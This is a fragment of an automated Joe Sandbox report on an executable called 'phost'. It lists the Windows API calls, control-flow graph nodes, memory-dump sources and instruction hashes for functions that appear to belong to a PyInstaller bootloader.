                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF62CC8F11A,?,?,-00000018,00007FF62CC8ADC3,?,?,?,00007FF62CC8ACBA,?,?,?,00007FF62CC85FAE), ref: 00007FF62CC8EF08
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                              • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                              • API String ID: 3013587201-537541572
                                                                                                                                                                                                                              • Opcode ID: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                                                                                                                                                                                              • Instruction ID: ba84b8ed72b7d6acf3bd2c08ec4217b2942624cd64973867c96c84c2aeef3cd7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F4114A5B19A5282FF16CB1A9C1497622B1BF49BF0F884239ED1DC7384EF3CE4058342

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,00007FF62CC73804), ref: 00007FF62CC736E1
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF62CC73804), ref: 00007FF62CC736EB
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC72C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF62CC73706,?,00007FF62CC73804), ref: 00007FF62CC72C9E
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC72C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF62CC73706,?,00007FF62CC73804), ref: 00007FF62CC72D63
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC72C50: MessageBoxW.USER32 ref: 00007FF62CC72D99
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                              • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                              • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                              • Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                                              • Instruction ID: b956c5c0559a42c694c9bc162a435fcaa0ce6a7cf8795c578b551813880ac6c6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8821A7A1F1CA4291FE20972CEC553B62274FF883B8F844136E55DCA5D5EE2CE509D302

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 744 7ff62cc8bacc-7ff62cc8baf2 745 7ff62cc8baf4-7ff62cc8bb08 call 7ff62cc84f58 call 7ff62cc84f78 744->745 746 7ff62cc8bb0d-7ff62cc8bb11 744->746 764 7ff62cc8befe 745->764 748 7ff62cc8bee7-7ff62cc8bef3 call 7ff62cc84f58 call 7ff62cc84f78 746->748 749 7ff62cc8bb17-7ff62cc8bb1e 746->749 766 7ff62cc8bef9 call 7ff62cc8a950 748->766 749->748 752 7ff62cc8bb24-7ff62cc8bb52 749->752 752->748 753 7ff62cc8bb58-7ff62cc8bb5f 752->753 756 7ff62cc8bb61-7ff62cc8bb73 call 7ff62cc84f58 call 7ff62cc84f78 753->756 757 7ff62cc8bb78-7ff62cc8bb7b 753->757 756->766 762 7ff62cc8bb81-7ff62cc8bb87 757->762 763 7ff62cc8bee3-7ff62cc8bee5 757->763 762->763 768 7ff62cc8bb8d-7ff62cc8bb90 762->768 767 7ff62cc8bf01-7ff62cc8bf18 763->767 764->767 766->764 768->756 771 7ff62cc8bb92-7ff62cc8bbb7 768->771 773 7ff62cc8bbb9-7ff62cc8bbbb 771->773 774 7ff62cc8bbea-7ff62cc8bbf1 771->774 777 7ff62cc8bbe2-7ff62cc8bbe8 773->777 778 7ff62cc8bbbd-7ff62cc8bbc4 773->778 775 7ff62cc8bbf3-7ff62cc8bc1b call 7ff62cc8d66c call 7ff62cc8a9b8 * 2 774->775 776 7ff62cc8bbc6-7ff62cc8bbdd call 7ff62cc84f58 call 7ff62cc84f78 call 7ff62cc8a950 774->776 807 7ff62cc8bc38-7ff62cc8bc63 call 7ff62cc8c2f4 775->807 808 7ff62cc8bc1d-7ff62cc8bc33 call 7ff62cc84f78 call 7ff62cc84f58 775->808 805 7ff62cc8bd70 776->805 779 7ff62cc8bc68-7ff62cc8bc7f 777->779 778->776 778->777 782 7ff62cc8bc81-7ff62cc8bc89 779->782 783 7ff62cc8bcfa-7ff62cc8bd04 call 7ff62cc9398c 779->783 782->783 786 7ff62cc8bc8b-7ff62cc8bc8d 782->786 794 7ff62cc8bd8e 783->794 795 7ff62cc8bd0a-7ff62cc8bd1f 783->795 786->783 792 7ff62cc8bc8f-7ff62cc8bca5 786->792 792->783 797 7ff62cc8bca7-7ff62cc8bcb3 792->797 803 7ff62cc8bd93-7ff62cc8bdb3 ReadFile 794->803 795->794 799 7ff62cc8bd21-7ff62cc8bd33 GetConsoleMode 795->799 797->783 801 7ff62cc8bcb5-7ff62cc8bcb7 797->801 799->794 804 7ff62cc8bd35-7ff62cc8bd3d 799->804 801->783 806 7ff62cc8bcb9-7ff62cc8bcd1 801->806 809 7ff62cc8bdb9-7ff62cc8bdc1 803->809 810 7ff62cc8bead-7ff62cc8beb6 GetLastError 803->810 804->803 813 7ff62cc8bd3f-7ff62cc8bd61 ReadConsoleW 804->813 816 7ff62cc8bd73-7ff62cc8bd7d call 7ff62cc8a9b8 805->816 806->783 817 7ff62cc8bcd3-7ff62cc8bcdf 806->817 807->779 808->805 809->810 811 7ff62cc8bdc7 809->811 814 7ff62cc8bed3-7ff62cc8bed6 810->814 815 7ff62cc8beb8-7ff62cc8bece call 7ff62cc84f78 call 7ff62cc84f58 810->815 819 7ff62cc8bdce-7ff62cc8bde3 811->819 821 7ff62cc8bd82-7ff62cc8bd8c 813->821 822 7ff62cc8bd63 GetLastError 813->822 826 7ff62cc8bd69-7ff62cc8bd6b call 7ff62cc84eec 814->826 827 7ff62cc8bedc-7ff62cc8bede 814->827 815->805 816->767 817->783 825 7ff62cc8bce1-7ff62cc8bce3 817->825 819->816 829 7ff62cc8bde5-7ff62cc8bdf0 819->829 821->819 822->826 825->783 833 7ff62cc8bce5-7ff62cc8bcf5 825->833 826->805 827->816 836 7ff62cc8bdf2-7ff62cc8be0b call 7ff62cc8b6e4 829->836 837 7ff62cc8be17-7ff62cc8be1f 829->837 833->783 844 7ff62cc8be10-7ff62cc8be12 836->844 840 7ff62cc8be21-7ff62cc8be33 837->840 841 7ff62cc8be9b-7ff62cc8bea8 call 7ff62cc8b524 837->841 845 7ff62cc8be8e-7ff62cc8be96 840->845 846 7ff62cc8be35 840->846 841->844 844->816 845->816 848 7ff62cc8be3a-7ff62cc8be41 846->848 849 7ff62cc8be43-7ff62cc8be47 848->849 850 7ff62cc8be7d-7ff62cc8be88 848->850 851 7ff62cc8be63 849->851 852 7ff62cc8be49-7ff62cc8be50 849->852 850->845 854 7ff62cc8be69-7ff62cc8be79 851->854 852->851 853 7ff62cc8be52-7ff62cc8be56 852->853 853->851 856 7ff62cc8be58-7ff62cc8be61 853->856 854->848 855 7ff62cc8be7b 854->855 855->845 856->854
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 07c5dcf76cbe3182a9f46e495b791f87a2923bbe72b553d2f04cfdf557d03735
                                                                                                                                                                                                                              • Instruction ID: 7c077e2aff5f63cf7d231dc390abb066b8caf8f986de67185a38806eb2660584
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 07c5dcf76cbe3182a9f46e495b791f87a2923bbe72b553d2f04cfdf557d03735
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CAC1C432B0C68695EF628B199C60ABF6770EB81BE0F554235EA4D83795CF7CE8458312

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 995526605-0
                                                                                                                                                                                                                              • Opcode ID: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
                                                                                                                                                                                                                              • Instruction ID: c166246b85d03a646761b3896349f19c8ff6b633cd934497a3b87f2dd3d656c6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F215E31B0CA4282EF109B59F85423AA7B4FF857B4F104235EAAD87AE5DE7CD4498701

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC78760: GetCurrentProcess.KERNEL32 ref: 00007FF62CC78780
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC78760: OpenProcessToken.ADVAPI32 ref: 00007FF62CC78793
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC78760: GetTokenInformation.KERNELBASE ref: 00007FF62CC787B8
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC78760: GetLastError.KERNEL32 ref: 00007FF62CC787C2
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC78760: GetTokenInformation.KERNELBASE ref: 00007FF62CC78802
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC78760: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF62CC7881E
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC78760: CloseHandle.KERNEL32 ref: 00007FF62CC78836
                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,00007FF62CC73C55), ref: 00007FF62CC7916C
                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,00007FF62CC73C55), ref: 00007FF62CC79175
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                              • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                              • API String ID: 6828938-1529539262
                                                                                                                                                                                                                              • Opcode ID: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
                                                                                                                                                                                                                              • Instruction ID: 5e4798eeac2ffc8ab57c50db14f613c81a7e613efd7e0007e22eed7f2adb0230
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 57213C21B08A8282FE14AB15ED152FA6378EF887A0F444035EA4DD7796DF3CE949D742

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 963 7ff62cc8cfd0-7ff62cc8cff5 964 7ff62cc8d2c3 963->964 965 7ff62cc8cffb-7ff62cc8cffe 963->965 968 7ff62cc8d2c5-7ff62cc8d2d5 964->968 966 7ff62cc8d000-7ff62cc8d032 call 7ff62cc8a884 965->966 967 7ff62cc8d037-7ff62cc8d063 965->967 966->968 970 7ff62cc8d06e-7ff62cc8d074 967->970 971 7ff62cc8d065-7ff62cc8d06c 967->971 973 7ff62cc8d084-7ff62cc8d099 call 7ff62cc9398c 970->973 974 7ff62cc8d076-7ff62cc8d07f call 7ff62cc8c390 970->974 971->966 971->970 978 7ff62cc8d09f-7ff62cc8d0a8 973->978 979 7ff62cc8d1b3-7ff62cc8d1bc 973->979 974->973 978->979 982 7ff62cc8d0ae-7ff62cc8d0b2 978->982 980 7ff62cc8d1be-7ff62cc8d1c4 979->980 981 7ff62cc8d210-7ff62cc8d235 WriteFile 979->981 985 7ff62cc8d1c6-7ff62cc8d1c9 980->985 986 7ff62cc8d1fc-7ff62cc8d20e call 7ff62cc8ca88 980->986 983 7ff62cc8d240 981->983 984 7ff62cc8d237-7ff62cc8d23d GetLastError 981->984 987 7ff62cc8d0c3-7ff62cc8d0ce 982->987 988 7ff62cc8d0b4-7ff62cc8d0bc call 7ff62cc84830 982->988 993 7ff62cc8d243 983->993 984->983 994 7ff62cc8d1e8-7ff62cc8d1fa call 7ff62cc8cca8 985->994 995 7ff62cc8d1cb-7ff62cc8d1ce 985->995 1007 7ff62cc8d1a0-7ff62cc8d1a7 986->1007 990 7ff62cc8d0df-7ff62cc8d0f4 GetConsoleMode 987->990 991 7ff62cc8d0d0-7ff62cc8d0d9 987->991 988->987 998 7ff62cc8d0fa-7ff62cc8d100 990->998 999 7ff62cc8d1ac 990->999 991->979 991->990 1001 7ff62cc8d248 993->1001 994->1007 1002 7ff62cc8d254-7ff62cc8d25e 995->1002 1003 7ff62cc8d1d4-7ff62cc8d1e6 call 7ff62cc8cb8c 995->1003 1005 7ff62cc8d106-7ff62cc8d109 998->1005 1006 7ff62cc8d189-7ff62cc8d19b call 7ff62cc8c610 998->1006 999->979 1008 7ff62cc8d24d 1001->1008 1009 7ff62cc8d260-7ff62cc8d265 1002->1009 1010 7ff62cc8d2bc-7ff62cc8d2c1 1002->1010 1003->1007 1013 7ff62cc8d114-7ff62cc8d122 1005->1013 1014 7ff62cc8d10b-7ff62cc8d10e 1005->1014 1006->1007 1007->1001 1008->1002 1016 7ff62cc8d293-7ff62cc8d29d 1009->1016 1017 7ff62cc8d267-7ff62cc8d26a 1009->1017 1010->968 1022 7ff62cc8d180-7ff62cc8d184 1013->1022 1023 7ff62cc8d124 1013->1023 1014->1008 1014->1013 1020 7ff62cc8d29f-7ff62cc8d2a2 1016->1020 1021 7ff62cc8d2a4-7ff62cc8d2b3 1016->1021 1018 7ff62cc8d283-7ff62cc8d28e call 7ff62cc84f34 1017->1018 1019 7ff62cc8d26c-7ff62cc8d27b 1017->1019 1018->1016 1019->1018 1020->964 1020->1021 1021->1010 1022->993 1025 7ff62cc8d128-7ff62cc8d13f call 7ff62cc93a58 1023->1025 1029 7ff62cc8d141-7ff62cc8d14d 1025->1029 1030 7ff62cc8d177-7ff62cc8d17d GetLastError 1025->1030 1031 7ff62cc8d14f-7ff62cc8d161 call 7ff62cc93a58 1029->1031 1032 7ff62cc8d16c-7ff62cc8d173 1029->1032 1030->1022 1031->1030 1036 7ff62cc8d163-7ff62cc8d16a 1031->1036 1032->1022 1033 7ff62cc8d175 1032->1033 1033->1025 1036->1032
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF62CC8CFBB), ref: 00007FF62CC8D0EC
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF62CC8CFBB), ref: 00007FF62CC8D177
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 953036326-0
                                                                                                                                                                                                                              • Opcode ID: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                                                                                                                                                                                              • Instruction ID: 77335aec0e42fd1705b22e2900202b89684c68aab3852969dafa40764a352c3d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B919472F1865295FB519F699C40ABE2BB0AF44BE8F144239DE0ED7685DF38D4828701
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1279662727-0
                                                                                                                                                                                                                              • Opcode ID: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                                                                                                                                                                                              • Instruction ID: 271a94c00b644a4ab053a53586846c446c36e41e32e8fdcb754450a43629838b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B941A222F2878283FB11CB64995077A6271FB957B4F109335EA5C83AD6DFBCA5E08701
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3251591375-0
                                                                                                                                                                                                                              • Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                              • Instruction ID: 8b79717dbfe36037813a08f35e9a0aef6439a820653bdf8024acb8f381f60797
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 95315920F08A5346FE24AB2CDD253B916B9EF517A4F444434E54ECF2D7DE2CA409E253
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                                                                                              • Opcode ID: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
                                                                                                                                                                                                                              • Instruction ID: 7c5e636b1f99b1f3289bb900d05f14083dc29493701ffd36ec12ef4c19b37575
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C9D09E20B0874652EF697B785CAD4F912716F48BA5F145578C80FC6393DD6CE4898302
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
